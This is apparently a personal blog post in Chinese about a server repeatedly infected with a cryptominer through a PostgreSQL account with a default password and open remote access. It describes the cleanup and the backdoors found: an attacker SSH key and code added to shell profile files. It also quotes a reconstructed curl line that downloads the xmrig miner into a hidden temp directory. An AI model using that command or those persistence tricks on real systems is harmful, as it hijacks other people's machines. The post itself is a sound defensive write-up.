记最近服务器被挖矿的经历

最近服务器三次被挖矿了。

第一次

在服务器上安装了postgres数据库,为了方便,使用默认密码postgres,并在配置中设置listen_addresses = *方便远程房访问数据库,认为应该没人会来攻击我。结果没过几天,服务器就被植入了挖矿程序,阿里云报警。

top再P查看CPU占用最高的进程,是一个以postgres用户运行的.ddns进程。

前往/proc/{pid}查看挖矿进程运行的命令和可执行文件所在路径,定位到linux临时目录var/tmp/下。

ll -a查看所有文件,红框框内的都是挖矿程序使用的目录。果断全部删光光。然后ps aux | grep postgres将对应的可疑进程都kill掉。

我本以为把进程全部kill掉,再把这些可执行文件删光就可以了,然后将密码改成自己常用的复杂密码就可以了,果然还是太年轻,于是就出现了第二次被挖矿的经历了。

第二次

第二次,没有任何预期,阿里云又报服务器被挖矿的消息。依然和上次一样把进程干掉,并挖矿程序删除掉。

当时比较忙,没想太多,以为就是黑客把我密码爆破了,然后植入了挖矿程序。

然后在avast上(https://www.avast.com/zh-cn/random-password-generator)把密码换成了随机密码。

第三次

第三次,当我用服务器用得正爽时,阿里云又通知我被入侵了,我一下子来兴趣了,我想看看这个人到底为什么能一直入侵我。

经历上面两次入侵,我在想以下两个问题:

1、为什么我改了postgres的密码,还能被入侵?思考:是不是某个地方泄露了我的密码?

2、为什么这次被入侵的又是postgres用户?思考:如果黑客是以爆破密码的方式入侵我的服务器,那为什么不爆破root用户。

3、这次入侵时,我刚好在用postgres用户导出数据,用postgres用户往本地传输了一份文件,难道是我以postgres登录时泄露了密码?

基于以上两点,我很怀疑我的postgres用户的密码泄露了,但是我还是linux小白,于是只能在google上寻找答案。

找了很久,翻了一些被人被入侵的博文,原因大致就是,被入侵后,黑客在服务器上留了一些后门:

【【【【【【【【【【【重点】】】】】】】】】】】】

1、黑客在postgres用户目录下保存了ssh公钥(.ssh/authorized_keys),这样他无需输入密码就可以远程登录。我这里就发现postgres用户下就有他的公钥,删除即可。

2、黑客在postgres用户目录下的.bash_profile.bash_login.profile.bashrc.bash_logout文件中添加了他自己的后门脚本代码。这样,在你登录或者退出登录时,都会执行他自己的后门脚本代码。于是我在我的服务器中发现了他的后门代码,原始代码已经找不到了(服务器到期了。。。),大致有一段如下:

/bin/curl -fsSL -o /var/tmp/.crypto/.../xmr/ https://github.com/xmrig/xmrig/releases/download/v6.10.0/xmrig-6.10.0-linux-static-x64.tar.gz  

这就能解释为什么我一用postgres用户登陆服务器后,就会被入侵了。

黑客信息

此外我在黑客植入的.crypto目录下发现了一些黑客挖矿的日志文件,里面记载了一些ip啥的,通过一些IP查询的网站,能确定两个地区的ip,一个是欧洲一个国家,忘记名字了,另一个是美国。

由于服务器时间刚好到期,最近也比较忙,很多东西还没来得及发掘,服务器就没了,可惜。

posted @ 2022-03-28 23:17  yury757  阅读(588)  评论(0)    收藏  举报